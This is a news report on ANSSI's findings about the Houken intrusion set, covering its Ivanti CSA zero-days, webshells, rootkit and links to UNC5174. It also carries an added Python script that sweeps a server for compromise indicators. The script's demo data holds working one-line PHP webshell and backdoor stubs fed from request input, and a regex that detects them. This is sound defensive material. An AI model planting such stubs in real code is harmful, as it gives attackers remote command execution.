The French cybersecurity agency ANSSI has exposed a sophisticated threat actor dubbed Houken. First observed exploiting zero-day vulnerabilities in Ivanti Cloud Service Appliance (CSA) devices in September 2024, Houken appears to be an initial access broker leveraging advanced techniques to breach networks across strategic sectors.
“Moderately sophisticated, Houken can be characterized by an ambivalent use of resources,” notes ANSSI in its report. While the threat actor demonstrates the technical prowess required to exploit zero-day vulnerabilities (CVE-2024-8190, CVE-2024-8963, CVE-2024-9380) and develop rootkits, it paradoxically relies on publicly available offensive tools—often authored by Chinese-speaking developers—indicating both access to elite capabilities and the opportunism of commodity tooling.
The campaign’s targets included entities in France’s governmental, telecommunications, media, finance, and transport sectors, with successful intrusions followed by lateral movement, credential harvesting, and persistent backdoor deployment.
Houken’s toolkit was expansive: from PHP webshells like /rc/help.php and /gsb/hsh.php, to the “OutlookEN.aspx” file—a known suo5 proxy tunnel tool—strategically deployed on Microsoft Exchange servers. The attacker even modified legitimate PHP scripts (e.g., /client/index.php) to silently introduce backdoors.
An example of sophistication was the deployment of a custom Linux rootkit (sysinitd.ko and sysinitd) allowing TCP traffic hijacking and remote root command execution, described by ANSSI as a persistence mechanism that “might indicate that the target is considered as valuable for the attacker.”
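The artifacts named above (the webshell paths, the silently modified legitimate PHP script, and the sysinitd rootkit components) are the kind of indicators a defender sweeps for on an appliance after exposure to these CVEs. The following script is an added example and is not from the ANSSI report; the paths and component names come from the report, but the web-root contents, the baseline hash, the /proc/modules text, the process list, and the PHP stub regex are constructed for illustration.

```python
import hashlib
import os
import re
import tempfile

# Webshell paths named in the ANSSI report, relative to the web root.
KNOWN_WEBSHELLS = ("rc/help.php", "gsb/hsh.php", "OutlookEN.aspx")
# Rootkit components named in the report (kernel module and userland binary).
ROOTKIT_NAMES = ("sysinitd", "sysinitd.ko")
# /proc/modules lists module names without the .ko suffix.
ROOTKIT_MODULES = {n[:-3] if n.endswith(".ko") else n for n in ROOTKIT_NAMES}

# Constructed heuristic: an execution builtin fed straight from request input,
# the shape of a stub appended to an otherwise legitimate script.
SUSPICIOUS_PHP = re.compile(
    rb"\b(eval|assert|system|passthru|shell_exec)\s*\(\s*(base64_decode\s*\(\s*)?"
    rb"\$_(GET|POST|REQUEST|COOKIE)\b",
    re.IGNORECASE,
)


def sha256_file(path):
    with open(path, "rb") as f:
        return hashlib.sha256(f.read()).hexdigest()


def find_known_webshells(root):
    """Return the report-named webshell paths present under root."""
    return [rel for rel in KNOWN_WEBSHELLS if os.path.isfile(os.path.join(root, rel))]


def find_tampered_scripts(root, baseline):
    """Check every .php file against a known-good hash baseline and scan its
    body for a request-driven execution stub. Returns {rel_path: [reasons]}."""
    findings = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.endswith(".php"):
                continue
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            reasons = []
            expected = baseline.get(rel)
            if expected is None:
                reasons.append("not in baseline")
            elif sha256_file(full) != expected:
                reasons.append("hash mismatch")
            with open(full, "rb") as f:
                if SUSPICIOUS_PHP.search(f.read()):
                    reasons.append("request-driven exec stub")
            if reasons:
                findings[rel] = reasons
    return findings


def find_rootkit_modules(proc_modules_text):
    """Parse /proc/modules-style lines (name size refcount ...) for the module."""
    hits = []
    for line in proc_modules_text.splitlines():
        fields = line.split()
        if fields and fields[0] in ROOTKIT_MODULES:
            hits.append(fields[0])
    return hits


def find_rootkit_processes(process_names):
    return [p for p in process_names if p in ROOTKIT_NAMES]


def run_sweep(root, baseline, proc_modules_text, process_names):
    return {
        "webshells": find_known_webshells(root),
        "tampered_php": find_tampered_scripts(root, baseline),
        "rootkit_modules": find_rootkit_modules(proc_modules_text),
        "rootkit_processes": find_rootkit_processes(process_names),
    }


# --- constructed demo data, not real appliance content ---
CLEAN_INDEX_PHP = b"<?php\n// legitimate client entry point (constructed)\nrequire 'bootstrap.php';\n"
TAMPERED_INDEX_PHP = CLEAN_INDEX_PHP + b"@eval($_POST['c']);\n"  # legit code + appended stub
WEBSHELL_PHP = b"<?php system($_GET['cmd']); ?>\n"
PROC_MODULES_SAMPLE = (
    "sysinitd 16384 0 - Live 0xffffffffc0a00000 (OE)\n"
    "xt_conntrack 16384 1 - Live 0xffffffffc09f0000\n"
)
PROCESS_SAMPLE = ["systemd", "sshd", "sysinitd", "php-fpm"]


def build_demo_root():
    """Create a throwaway web root holding one tampered script and one webshell.
    Returns (root, baseline); the baseline carries the hash of the clean index.php."""
    root = tempfile.mkdtemp(prefix="csa-demo-")
    os.makedirs(os.path.join(root, "client"))
    os.makedirs(os.path.join(root, "rc"))
    with open(os.path.join(root, "client", "index.php"), "wb") as f:
        f.write(TAMPERED_INDEX_PHP)
    with open(os.path.join(root, "rc", "help.php"), "wb") as f:
        f.write(WEBSHELL_PHP)
    return root, {"client/index.php": hashlib.sha256(CLEAN_INDEX_PHP).hexdigest()}


if __name__ == "__main__":
    demo_root, demo_baseline = build_demo_root()
    for key, value in run_sweep(demo_root, demo_baseline, PROC_MODULES_SAMPLE, PROCESS_SAMPLE).items():
        print(f"{key}: {value}")
```

The hash baseline is the part that catches the tampered `/client/index.php`: a stub appended to a legitimate script keeps the file's name and location, so a path allowlist alone misses it, and a content heuristic can be evaded by obfuscation, whereas a mismatch against a known-good hash cannot. On a real appliance the baseline would come from a clean install or vendor package manifest, and the module and process listings would be read from `/proc/modules` and the process table rather than the constructed samples used here.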
Notably, Houken operators often self-patched the exploited vulnerabilities—a signature tactic previously linked to UNC5174, reinforcing suspicions about their connection.
ANSSI draws strong parallels between Houken and UNC5174, an intrusion set previously reported by Mandiant and Google’s Threat Intelligence Group as linked to China’s Ministry of State Security (MSS). The links are technical, behavioral, and operational:
- Use of identical tools like GOREVERSE, suo5, VShell, fscan;
- Reuse of infrastructure IP addresses across campaigns;
- Behavioral overlaps such as zero-day exploitation, self-patching, and credential harvesting.
“Given these similarities, the Houken and UNC5174 intrusion sets seem to be operated by a common threat actor,” ANSSI concludes.
The threat actor’s primary motivation appears to be brokering access to valuable systems, potentially reselling initial footholds or exfiltrated data to state-linked intelligence consumers. However, ANSSI observed evidence of direct data theft—notably from a South American Ministry of Foreign Affairs email system—as well as the installation of Monero (XMR) cryptominers via webshells, hinting at financially motivated side operations.
The infrastructure supporting Houken is vast and eclectic:
- Commercial VPNs like NordVPN and ExpressVPN;
- Dedicated servers from providers like HOSTHATCH and ColoCrossing;
- Even residential and mobile IPs across China, the U.S., India, and Europe.
Despite the scale, ANSSI points out a notable lack of segmentation, suggesting “an insufficient consideration for operational security.”
With activity observed through late 2024 and infrastructure links active in early 2025, Houken remains a live threat. Given its use of zero-days and evolving persistence mechanisms, organizations globally should be on high alert, especially those operating internet-facing services such as endpoint managers, VPN appliances, and email gateways.
“The threat actor behind the Houken and UNC5174 intrusion sets remains active. Both intrusion sets will likely be operated again… through worldwide and opportunistic vulnerability exploitation,” warns ANSSI.